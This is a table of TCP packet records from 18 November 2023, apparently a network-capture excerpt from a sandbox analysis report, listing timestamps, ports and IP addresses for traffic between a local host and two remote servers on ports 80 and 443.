Nov 18, 2023 10:02:36.242269039 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.242271900 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.242285013 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.242300987 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.242301941 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.242317915 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.242336988 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.242353916 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.242371082 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.242372036 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.242388010 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.242404938 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.242420912 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.242436886 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.242445946 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.242453098 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.242465973 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.242477894 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.242492914 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.242494106 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.242511034 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.242527962 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.242542982 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.242546082 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.242561102 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.242563963 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.242579937 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.242597103 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.242600918 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.242614031 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.242630005 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.242630959 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.242647886 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.242666960 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.242681980 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.242683887 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.242697954 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.242701054 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.242717981 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.242733955 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.242734909 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.242749929 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.242767096 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.242769957 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.242785931 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.242803097 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.242808104 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.242820024 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.242836952 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.242849112 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.242854118 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.242867947 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.242872000 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.242888927 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.242904902 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.242906094 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.242923975 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.242939949 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.242940903 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.242957115 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.242973089 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.242985010 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.242990017 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.243007898 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.243007898 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.243025064 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.243041992 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.243045092 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.243057966 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.243074894 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.243079901 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.243092060 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.243109941 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.243112087 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.243125916 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.243143082 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.243149042 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.243160009 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.243171930 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.243176937 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.243194103 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.243207932 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.243211985 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.243230104 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.243248940 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.243249893 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.243266106 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.243283987 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.243298054 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.243302107 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.243318081 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.243320942 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.243339062 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.243355036 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.243371964 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.243382931 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.243388891 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.243400097 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.243406057 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.243422985 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.243439913 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.243442059 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.243455887 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.243472099 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.243474960 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.243488073 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.243504047 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.243505001 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.243520975 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.243527889 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.243539095 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.243545055 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.243556023 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.243571997 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.243586063 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.243588924 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.243604898 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.243621111 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.243622065 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.243637085 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.243652105 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.243658066 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.243669033 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.243685007 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.243694067 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.243701935 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.243720055 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.243735075 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.243736029 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.243752956 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.243768930 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.243772030 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.243784904 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.243789911 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.243799925 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.243815899 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.243832111 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.243839979 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.243849039 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.243865013 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.243875980 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.243881941 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.243897915 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.243899107 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.243913889 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.243927002 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.243931055 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.243942976 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.243947983 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.243966103 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.243982077 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.243983984 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.243999004 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.244014978 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.244016886 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.244030952 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.244048119 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.244065046 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.244072914 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.244081020 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.244097948 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.244110107 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.244113922 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.244128942 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.244131088 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.244148970 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.244149923 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.244164944 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.244180918 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.244189978 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.244198084 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.244216919 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.244230032 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.244234085 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.244249105 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.244251013 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.244268894 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.244287014 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.244302034 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.244306087 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.244323969 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.244338036 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.244340897 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.244354010 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.244359970 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.244378090 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.244394064 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.244395971 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.244414091 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.244432926 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.244435072 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.244450092 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.244467974 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.244483948 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.244486094 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.244503021 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.244520903 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.244522095 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.244537115 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.244541883 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.244554996 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.244570971 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.244581938 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.244587898 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.244605064 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.244620085 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.244625092 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.244643927 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.244656086 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.244661093 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.244676113 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.244678974 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.244695902 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.244712114 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.244724989 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.244729042 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.244745970 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.244756937 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.244762897 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.244781017 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.244790077 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.244796991 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.244813919 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.244833946 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.244833946 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.244849920 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.244853020 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.244867086 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.244883060 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.244884014 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.244899988 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.244915962 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.244916916 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.244932890 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.244950056 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.244966030 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.244968891 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.244982004 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.244997978 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.245002031 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.245013952 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.245026112 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.245029926 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.245045900 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.245057106 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.245063066 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.245079994 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.245094061 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.245096922 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.245112896 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.245112896 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.245131969 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.245148897 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.245151997 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.245165110 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.245181084 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.245197058 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.245197058 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.245213985 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.245214939 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.245230913 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.245259047 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.245265007 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.245275974 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.245292902 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:36.245296001 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.245331049 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.262224913 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.263456106 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:36.270298004 CET	443	49745	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:36.270385027 CET	49745	443	192.168.2.4	104.21.89.193
Nov 18, 2023 10:02:36.270426035 CET	443	49745	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:36.270497084 CET	49745	443	192.168.2.4	104.21.89.193
Nov 18, 2023 10:02:36.270956993 CET	443	49745	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:36.271022081 CET	49745	443	192.168.2.4	104.21.89.193
Nov 18, 2023 10:02:36.271420956 CET	443	49745	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:36.271480083 CET	49745	443	192.168.2.4	104.21.89.193
Nov 18, 2023 10:02:36.272181988 CET	443	49745	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:36.272236109 CET	49745	443	192.168.2.4	104.21.89.193
Nov 18, 2023 10:02:36.273030996 CET	443	49745	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:36.273098946 CET	49745	443	192.168.2.4	104.21.89.193
Nov 18, 2023 10:02:36.273912907 CET	443	49745	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:36.273962021 CET	443	49745	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:36.273987055 CET	49745	443	192.168.2.4	104.21.89.193
Nov 18, 2023 10:02:36.273996115 CET	443	49745	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:36.274007082 CET	49745	443	192.168.2.4	104.21.89.193
Nov 18, 2023 10:02:36.274734020 CET	443	49745	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:36.274799109 CET	49745	443	192.168.2.4	104.21.89.193
Nov 18, 2023 10:02:36.274806023 CET	443	49745	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:36.274847031 CET	49745	443	192.168.2.4	104.21.89.193
Nov 18, 2023 10:02:36.275609016 CET	443	49745	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:36.275654078 CET	443	49745	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:36.275667906 CET	49745	443	192.168.2.4	104.21.89.193
Nov 18, 2023 10:02:36.275676012 CET	443	49745	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:36.275708914 CET	49745	443	192.168.2.4	104.21.89.193
Nov 18, 2023 10:02:36.276565075 CET	443	49745	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:36.276623011 CET	49745	443	192.168.2.4	104.21.89.193
Nov 18, 2023 10:02:36.276629925 CET	443	49745	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:36.276674032 CET	49745	443	192.168.2.4	104.21.89.193
Nov 18, 2023 10:02:36.277394056 CET	443	49745	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:36.277443886 CET	443	49745	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:36.277451038 CET	49745	443	192.168.2.4	104.21.89.193
Nov 18, 2023 10:02:36.277461052 CET	443	49745	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:36.277492046 CET	49745	443	192.168.2.4	104.21.89.193
Nov 18, 2023 10:02:36.278307915 CET	443	49745	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:36.278362989 CET	49745	443	192.168.2.4	104.21.89.193
Nov 18, 2023 10:02:36.278369904 CET	443	49745	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:36.278415918 CET	49745	443	192.168.2.4	104.21.89.193
Nov 18, 2023 10:02:36.279130936 CET	443	49745	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:36.279181004 CET	443	49745	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:36.279182911 CET	49745	443	192.168.2.4	104.21.89.193
Nov 18, 2023 10:02:36.279196024 CET	443	49745	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:36.279234886 CET	49745	443	192.168.2.4	104.21.89.193
Nov 18, 2023 10:02:36.279994965 CET	443	49745	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:36.280049086 CET	49745	443	192.168.2.4	104.21.89.193
Nov 18, 2023 10:02:36.280056953 CET	443	49745	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:36.280101061 CET	49745	443	192.168.2.4	104.21.89.193
Nov 18, 2023 10:02:36.280860901 CET	443	49745	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:36.280904055 CET	443	49745	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:36.280926943 CET	49745	443	192.168.2.4	104.21.89.193
Nov 18, 2023 10:02:36.280930996 CET	443	49745	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:36.280962944 CET	49745	443	192.168.2.4	104.21.89.193
Nov 18, 2023 10:02:36.280982018 CET	49745	443	192.168.2.4	104.21.89.193
Nov 18, 2023 10:02:36.281703949 CET	443	49745	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:36.281763077 CET	49745	443	192.168.2.4	104.21.89.193
Nov 18, 2023 10:02:36.282584906 CET	443	49745	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:36.282648087 CET	49745	443	192.168.2.4	104.21.89.193
Nov 18, 2023 10:02:36.283524036 CET	443	49745	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:36.283580065 CET	49745	443	192.168.2.4	104.21.89.193
Nov 18, 2023 10:02:36.284323931 CET	443	49745	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:36.284368992 CET	443	49745	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:36.284403086 CET	49745	443	192.168.2.4	104.21.89.193
Nov 18, 2023 10:02:36.284409046 CET	443	49745	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:36.284426928 CET	49745	443	192.168.2.4	104.21.89.193
Nov 18, 2023 10:02:36.285397053 CET	443	49745	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:36.285465956 CET	49745	443	192.168.2.4	104.21.89.193
Nov 18, 2023 10:02:36.285470963 CET	443	49745	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:36.285526991 CET	49745	443	192.168.2.4	104.21.89.193
Nov 18, 2023 10:02:36.285875082 CET	443	49745	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:36.285933971 CET	49745	443	192.168.2.4	104.21.89.193
